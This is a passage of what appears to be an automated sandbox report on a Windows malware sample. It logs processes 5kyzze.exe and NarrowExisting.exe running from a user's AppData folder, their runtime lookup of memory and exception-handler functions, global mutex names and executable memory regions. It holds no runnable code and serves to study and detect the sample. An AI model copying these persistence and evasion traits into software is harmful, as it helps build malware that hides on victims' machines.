| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = Ticks, time = 189759 |
|
1 | |
| Get Time | type = Ticks, time = 190773 |
|
1 | |
| Get Time | type = Ticks, time = 191772 |
|
1 |
Mutex (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #13: narrowexisting.exe
28
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa50 |
| Parent PID | 0x8f0 (c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7AC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00340000 | 0x003a6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003c2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003ddfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003edfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01c4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001c50000 | 0x01c50000 | 0x02042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02050000 | 0x0231efff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
Module (27)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #14: narrowexisting.exe
257
468
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:31, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa68 |
| Parent PID | 0xa50 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6D8
0x
A78
0x
61C
0x
5C4
0x
740
0x
B18
0x
4B0
0x
554
0x
5E4
0x
7A8
0x
3B8
0x
550
0x
568
0x
630
0x
664
0x
7D8
0x
620
0x
BD8
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bdfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00352fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00397fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00391fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003a0000 | 0x003a0fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x003a0000 | 0x003abfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x004f0000 | 0x0052bfff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x004f0000 | 0x004f7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x00500000 | 0x0050bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00520fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0276ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x02765fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x029bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02abffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02bbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73cc0000 | 0x73e5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x74270000 | 0x742a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x742b0000 | 0x742b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x742c0000 | 0x742c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x742d0000 | 0x742d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x742e0000 | 0x74339fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x74340000 | 0x7437bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74380000 | 0x74391fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x74600000 | 0x74607fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x74670000 | 0x7467ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74680000 | 0x74685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74690000 | 0x7469dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x746a0000 | 0x746a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x746b0000 | 0x746bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x746c0000 | 0x74703fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74710000 | 0x7474afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74750000 | 0x7475cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74760000 | 0x74766fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74770000 | 0x7478bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747b0000 | 0x747bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747c0000 | 0x747cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747d0000 | 0x747e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
